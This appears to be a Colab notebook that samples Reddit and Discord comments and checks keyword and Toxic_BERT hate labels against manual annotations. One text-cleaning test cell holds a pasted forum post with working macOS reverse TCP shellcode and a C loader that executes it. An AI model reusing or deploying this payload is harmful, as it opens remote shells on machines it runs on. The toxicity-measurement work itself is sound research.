In [1]:
from google.colab import drive
drive.mount('/content/drive')

Mounted at /content/drive


In [2]:

!pip3 install ipython-autotime

%load_ext autotime

import pandas as pd
import numpy as np
import re
from nltk.stem import WordNetLemmatizer
import nltk
from tqdm.notebook import tqdm
tqdm.pandas()
import requests

from termcolor import colored
import os
os.environ["TOKENIZERS_PARALLELISM"] = "false"

nb_workers=10

import os
from datetime import datetime
# import pickle
import ast
import re

Looking in indexes: https://pypi.org/simple, https://us-python.pkg.dev/colab-wheels/public/simple/
     |████████████████████████████████| 1.6 MB 12.6 MB/s 
time: 1.79 s (started: 2022-12-21 18:00:54 +00:00)


In [ ]:
import os
discords = os.listdir('/content/drive/MyDrive/Discord-Reddit/Datasets/discord')
subreddits = os.listdir('/content/drive/MyDrive/Discord-Reddit/Datasets/reddit')

# discords.remove('.ipynb_checkpoints')
# subreddits.remove('.ipynb_checkpoints')

time: 4.04 ms (started: 2022-11-30 12:58:11 +00:00)


In [ ]:
discords

['kpop_discord_hate.csv',
 'sports_discord_hate.csv',
 'nosleep_discord_hate.csv',
 'Games_discord_hate.csv',
 'Jokes_discord_hate.csv',
 'history_discord_hate.csv',
 'europe_discord_hate.csv',
 'music_discord_hate.csv',
 'ksi_discord_hate.csv',
 'rickandmorty_discord_hate.csv',
 'Rainbow6_discord_hate.csv',
 'dankmemes_discord_hate.csv',
 'Overwatch_discord_hate.csv',
 'Writingprompts_discord_hate.csv',
 'Ukrainian_discord_hate.csv']

time: 3.95 ms (started: 2022-11-29 11:55:28 +00:00)


In [ ]:
my_dir = '/content/drive/MyDrive/Discord-Reddit/Datasets/'
data=pd.read_csv(f'{my_dir}reddit/sports_subreddit_hate.csv',lineterminator='\n')
data

,Unnamed: 0,comment_text,author,timestamp,hate,comment_text_cleaned,Toxic_BERT
0,0,Cannabis being a drug is such an idiotic idea....,marauderingman,2022-08-05 08:53:07,1.0,cannabis being a drug is such an idiotic idea....,0.580445
1,1,People try to politicize the situation and it ...,BenCapra,2022-08-05 08:52:44,0.0,people try to politicize the situation and it ...,0.004940
2,2,How much does a cartridge go for in Russia,Mickmuff,2022-08-05 08:52:20,0.0,how much does a cartridge go for in russia,0.001223
3,3,Jailed. That's what you get,investoreba1,2022-08-05 08:39:22,1.0,jailed. that's what you get,0.001947
4,4,Why is she even there in the first place? Dumb...,mrsim20,2022-08-05 08:38:31,1.0,why is she even there in the first place? dumb...,0.994093
...,...,...,...,...,...,...,...
337995,337995,"He did more than roll his ankle, at minimum he...",Sequitur1,2022-01-02 17:17:44,0.0,"he did more than roll his ankle, at minimum he...",0.179300
337996,337996,“Not that deep.” If you thought that was an at...,slapshots1515,2022-01-02 17:16:02,0.0,“not that deep.” if you thought that was an at...,0.000780
337997,337997,I mean if you came out your final year of coll...,Dipsquat,2022-01-02 17:15:45,0.0,i mean if you came out your final year of coll...,0.009380
337998,337998,If you’re a protected NFL pick don’t even thin...,Wellspeak,2022-01-02 17:15:44,0.0,if you’re a protected nfl pick don’t even thin...,0.515768


time: 1.89 s (started: 2022-11-30 13:05:27 +00:00)


In [ ]:
data.rename({'comment_text':'content','author':'author_username'},axis=1, inplace=True)

,Unnamed: 0,content,author_username,timestamp,hate,comment_text_cleaned,Toxic_BERT
0,0,Hi there! [Your post](https://redd.it/wgtmxg) ...,NoSleepAutoBot,2022-08-05 12:07:57,0,hi there! [your post]( has been **temporarily*...,0.000919
1,1,I didn't pay attention to what subreddit this ...,sjik123,2022-08-05 11:57:52,0,i didn't pay attention to what subreddit this ...,0.000902
2,2,Bro,lordfeudal,2022-08-05 11:54:08,0,bro,0.008453
3,3,Thanks for that. I’m curious for the context now,W-eye,2022-08-05 11:53:37,0,thanks for that. i’m curious for the context now,0.000540
4,4,Your submission has been removed. Stories in /...,AutoModerator,2022-08-05 11:35:16,0,your submission has been removed. stories in /...,0.000579
...,...,...,...,...,...,...,...
100090,100090,Your submission has been removed. Stories in /...,AutoModerator,2022-01-02 17:01:56,0,your submission has been removed. stories in /...,0.000579
100091,100091,You make me ashamed to be British,MyEyesDontBreathe,2022-01-02 16:49:49,1,you make me ashamed to be british,0.061733
100092,100092,Which God did you met?\nThere’s something like...,Faelysis,2022-01-02 16:43:57,1,which god did you met? there’s something like ...,0.077283
100093,100093,I'M SORRY WHAT LADY IN THE WINDOWS,amahag29,2022-01-02 16:39:35,1,i'm sorry what lady in the windows,0.001704


time: 24.1 ms (started: 2022-11-30 12:38:51 +00:00)


In [ ]:
data=pd.read_csv(f'{my_dir}discord/nosleep_discord_hate.csv',lineterminator='\n')
data

,Unnamed: 0,content,author_id,author_username,timestamp,hate,content_cleaned,Toxic_BERT
0,0,Well let's hope it's just a glitch...,340914124513083392,100Donuts,2022-08-03T20:07:03.746000+00:00,0,well let's hope it's just a glitch...,0.004988
1,1,"If it hasn't fixed itself tomorrow, reach out ...",217012301818101771,tigerhallam,2022-08-03T19:38:06.702000+00:00,0,"if it hasn't fixed itself tomorrow, reach out ...",0.001686
2,2,"It might be a reddit glitch, it happens from t...",217012301818101771,tigerhallam,2022-08-03T19:37:57.797000+00:00,0,"it might be a reddit glitch, it happens from t...",0.006642
3,3,"Wooof, what a shot to my writing mojo... No ne...",340914124513083392,100Donuts,2022-08-03T19:36:41.958000+00:00,0,"wooof, what a shot to my writing mojo... no ne...",0.020160
4,4,Nope... Just noticed all my posts and comments...,340914124513083392,100Donuts,2022-08-03T19:13:45.881000+00:00,0,nope... just noticed all my posts and comments...,0.001076
...,...,...,...,...,...,...,...,...
6212,6212,"Y'all, I wanna do a poll about how people brow...",284832998577274880,Anuacyl,2022-01-02T03:10:31.737000+00:00,0,"y'all, i wanna do a poll about how people brow...",0.000994
6213,6213,ok thanks,483421263025405952,Neo C,2022-01-02T02:57:52.305000+00:00,0,ok thanks,0.000669
6214,6214,They're good at it and if one exists they'll f...,284832998577274880,Anuacyl,2022-01-02T02:57:42.094000+00:00,0,they're good at it and if one exists they'll f...,0.000582
6215,6215,r/nosleepfinder,284832998577274880,Anuacyl,2022-01-02T02:56:56.449000+00:00,0,r/nosleepfinder,0.006792


time: 1.16 s (started: 2022-11-30 12:35:50 +00:00)


In [ ]:
# platform = 'discord'
platform = 'reddit'

if platform == 'reddit':
  text_col = 'comment_text'
  author_col = 'author'
  platform_files = subreddits


if platform == 'discord':
  text_col = 'content'
  author_col = 'author_username'
  platform_files = discords

# data_all = pd.DataFrame()

for file_name in platform_files:
  community_x = file_name.split('_')[0]

  print(f'\n\nbegining with {file_name}')

  my_dir = '/content/drive/MyDrive/Discord-Reddit/Datasets/'
  data=pd.read_csv(f'{my_dir}{platform}/{file_name}',lineterminator='\n')
  print(f'{file_name} has {len(data)} data')
  data[text_col]=data[text_col].astype(str)
  data=data[data[text_col].map(len) > 2]
  data=data[data[author_col]!='error']
  data=data[data[author_col]!=0]
  data=data[data [author_col]!='AutoModerator']
  data.drop_duplicates(subset=text_col, keep='first', inplace=True, ignore_index=False)

  data.rename({'comment_text':'content','comment_text_cleaned':'content_cleaned','author':'author_username'},axis=1, inplace=True)
  data = data[['content','content_cleaned','author_username','timestamp','hate','Toxic_BERT']]
  
  data_tox=data[data['Toxic_BERT']>0.5].sample(50,random_state=1)
  data_tox['community'] = community_x
  data_tox['platform'] = platform

  data_non=data[data['Toxic_BERT']<=0.5].sample(50,random_state=1)
  data_non['community'] = community_x
  data_non['platform'] = platform

  data_all = pd.concat([data_all,data_non,data_tox],ignore_index=True)



begining with sports_subreddit_hate.csv
sports_subreddit_hate.csv has 338000 data


begining with kpop_subreddit_hate.csv
kpop_subreddit_hate.csv has 290000 data


begining with music_subreddit_hate.csv
music_subreddit_hate.csv has 1200000 data


begining with nosleep_subreddit_hate.csv
nosleep_subreddit_hate.csv has 100095 data


begining with ksi_subreddit_hate.csv
ksi_subreddit_hate.csv has 645000 data


begining with Overwatch_subreddit_hate.csv
Overwatch_subreddit_hate.csv has 710000 data


begining with history_subreddit_hate.csv
history_subreddit_hate.csv has 44741 data


begining with Jokes_subreddit_hate.csv
Jokes_subreddit_hate.csv has 522890 data


begining with rickandmorty_subreddit_hate.csv
rickandmorty_subreddit_hate.csv has 146494 data


/usr/local/lib/python3.7/dist-packages/pandas/util/_decorators.py:311: SettingWithCopyWarning: 
A value is trying to be set on a copy of a slice from a DataFrame

See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy
  return func(*args, **kwargs)
/usr/local/lib/python3.7/dist-packages/pandas/core/frame.py:5047: SettingWithCopyWarning: 
A value is trying to be set on a copy of a slice from a DataFrame

See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy
  errors=errors,




begining with Rainbow6_subreddit_hate.csv
Rainbow6_subreddit_hate.csv has 432000 data


begining with Ukrainian_subreddit_hate.csv


/usr/local/lib/python3.7/dist-packages/IPython/core/interactiveshell.py:3326: DtypeWarning: Columns (2,3) have mixed types.Specify dtype option on import or set low_memory=False.
  exec(code_obj, self.user_global_ns, self.user_ns)


Ukrainian_subreddit_hate.csv has 2305000 data


begining with dankmemes_subreddit_hate.csv
dankmemes_subreddit_hate.csv has 1800000 data


begining with Writingprompts_subreddit_hate.csv
Writingprompts_subreddit_hate.csv has 150000 data


begining with europe_subreddit_hate.csv
europe_subreddit_hate.csv has 2007786 data


begining with Games_subreddit_hate.csv
Games_subreddit_hate.csv has 854995 data
time: 2min 26s (started: 2022-11-30 13:06:26 +00:00)


In [ ]:
data_all.to_excel(my_dir+'Samples/toxic-nontoxic_Sample_50.xlsx')

time: 890 ms (started: 2022-11-30 13:23:05 +00:00)


In [ ]:
text =  '  test* pixe1 said: один из немногих работающих бэк-коннект шелкодов под macosx 10. х86/64 \nпод шел rat подогнать думаю будет несложно.  \n  \n \n***CODE***\n#include <sys/mman.h>\n#include <inttypes.h>\n#include <unistd.h>\n\n\n/#osx reverse tcp shell (131 bytes)\n;#replace ffffffff around byte 43 with the call back ip in hex\n;#replace 5c11 around byte 39 with a new port current is 4444\n/\n\nchar code[] =\n"\\x41\\xb0\\x02\\x49\\xc1\\xe0\\x18\\x49\\x83\\xc8\\x61\\x4c\\x89\\xc0\\x48" \n"\\x31\\xd2\\x48\\x89\\xd6\\x48\\xff\\xc6\\x48\\x89\\xf7\\x48\\xff\\xc7\\x0f" \n"\\x05\\x49\\x89\\xc4\\x49\\xbd\\x01\\x01\\x11\\x5c\\xff\\xff\\xff\\xff\\x41" \n"\\xb1\\xff\\x4d\\x29\\xcd\\x41\\x55\\x49\\x89\\xe5\\x49\\xff\\xc0\\x4c\\x89"\n"\\xc0\\x4c\\x89\\xe7\\x4c\\x89\\xee\\x48\\x83\\xc2\\x10\\x0f\\x05\\x49\\x83"\n"\\xe8\\x08\\x48\\x31\\xf6\\x4c\\x89\\xc0\\x4c\\x89\\xe7\\x0f\\x05\\x48\\x83"\n"\\xfe\\x02\\x48\\xff\\xc6\\x76\\xef\\x49\\x83\\xe8\\x1f\\x4c\\x89\\xc0\\x48"\n"\\x31\\xd2\\x49\\xbd\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x49\\xc1\\xed"\n"\\x08\\x41\\x55\\x48\\x89\\xe7\\x48\\x31\\xf6\\x0f\\x05"\n\n\nint main()\n{\n\xa0 \xa0int (ret)() = (int ()())code;\n\xa0 \xa0void page = (void )((uintptr_t)code & ~(getpagesize() - 1));\n\n\xa0 \xa0mprotect(page, sizeof code, prot_exec);\n\n\xa0 \xa0ret();\n\n\xa0 \xa0return 0;\n} \n***CODE***\n  \n \n \nспасибо!:) в чем его можно скомпилить? не кодил под osx....  \n \n \n  \n  \ngcc на маке ...'
# text = "test test test test***CODE*** jfdaklheöhkhölk ***CODE*** fjaklöjk"

text=re.sub("\*\*\*CODE\*\*\*.*\*\*\*CODE\*\*\*", "", text, flags=re.DOTALL) #because crawler generates IMAGES that way
text=re.sub("\*\*\*IMG\*\*\*[^()]*\*\*\*IMG\*\*\*", "", text, flags=re.DOTALL) #because crawler generates IMAGES that way
text=re.sub("\*\*\*LINK\*\*\*[^()]*\*\*\*LINK\*\*\*", "", text, flags=re.DOTALL) #because crawler generates link that way
text=re.sub("\*\*\*CITINGMISSEDPOST\*\*\*", "", text, flags=re.DOTALL)




time: 3.03 ms (started: 2022-11-28 17:11:09 +00:00)


In [4]:
my_dir = '/content/drive/MyDrive/Discord-Reddit/Datasets/'
data_all=pd.read_excel(my_dir+'Samples/toxic-nontoxic_Sample_50.xlsx')
data_all

,Unnamed: 0,content,content_cleaned,author_username,timestamp,hate,Toxic_BERT,community,platform,Hate_manual
0,0.0,Via Hybe America's acquuisition of scooter bra...,via hybe america's acquuisition of scooter bra...,Rando 🐰,2022-04-07T21:06:50.104000+00:00,0.0,0.001109,kpop,discord,0.0
1,1.0,never bleached in my life,never bleached in my life,piku,2022-07-01T17:53:32.129000+00:00,0.0,0.008738,kpop,discord,1.0
2,2.0,<:rikusneaky:742048271345647707>,,watanabees,2022-06-30T23:29:03.477000+00:00,0.0,0.001995,kpop,discord,0.0
3,3.0,Sangsus,sangsus,Money,2022-04-26T01:56:30.773000+00:00,0.0,0.011963,kpop,discord,0.0
4,4.0,Saskatchitoon,saskatchitoon,Tendon,2022-02-01T04:11:08.783000+00:00,0.0,0.007694,kpop,discord,0.0
...,...,...,...,...,...,...,...,...,...,...
2995,2995.0,"Banned from Capcom events, banned from Evo, ba...","banned from capcom events, banned from evo, ba...",PineappleHour,2022-01-07 17:57:11,0.0,0.940887,Games,reddit,1.0
2996,2996.0,They don't weasel shit. Those countries just h...,they don't weasel shit. those countries just h...,TheWorldisFullofWar,2022-05-31 16:23:12,0.0,0.607392,Games,reddit,1.0
2997,2997.0,The biggest trouble with Genshin's story is th...,the biggest trouble with genshin's story is th...,Lambpanties,2022-05-04 11:06:26,0.0,0.767135,Games,reddit,1.0
2998,2998.0,All my homies hate the googly-eyed monster,all my homies hate the googly eyed monster,ReligionIsAwful,2022-02-24 13:17:52,0.0,0.684187,Games,reddit,1.0


time: 3.53 s (started: 2022-12-21 18:01:34 +00:00)


In [8]:
from sklearn.metrics import f1_score, confusion_matrix

time: 542 µs (started: 2022-12-21 18:08:47 +00:00)


In [9]:
def get_binary_toxicity(value_x, cutoff_x=0.5):
  if value_x >= 0.5:
    return 1
  if value_x < 0.5:
    return 0

time: 800 µs (started: 2022-12-21 18:12:30 +00:00)


In [10]:
data_all['Toxic_BERT_binary'] = data_all['Toxic_BERT'].map(get_binary_toxicity)

time: 4.54 ms (started: 2022-12-21 18:12:59 +00:00)


In [11]:
print(confusion_matrix(y_true=data_all.Hate_manual, y_pred=data_all.hate))
print(f1_score(y_true=data_all.Hate_manual, y_pred=data_all.hate))

[[1324   72]
 [ 400 1204]]
0.8361111111111111
time: 18.5 ms (started: 2022-12-21 18:13:07 +00:00)


In [12]:
print(confusion_matrix(y_true=data_all.Hate_manual, y_pred=data_all.Toxic_BERT_binary))
print(f1_score(y_true=data_all.Hate_manual, y_pred=data_all.Toxic_BERT_binary))

[[1303   93]
 [ 197 1407]]
0.9065721649484536
time: 25.3 ms (started: 2022-12-21 18:13:35 +00:00)
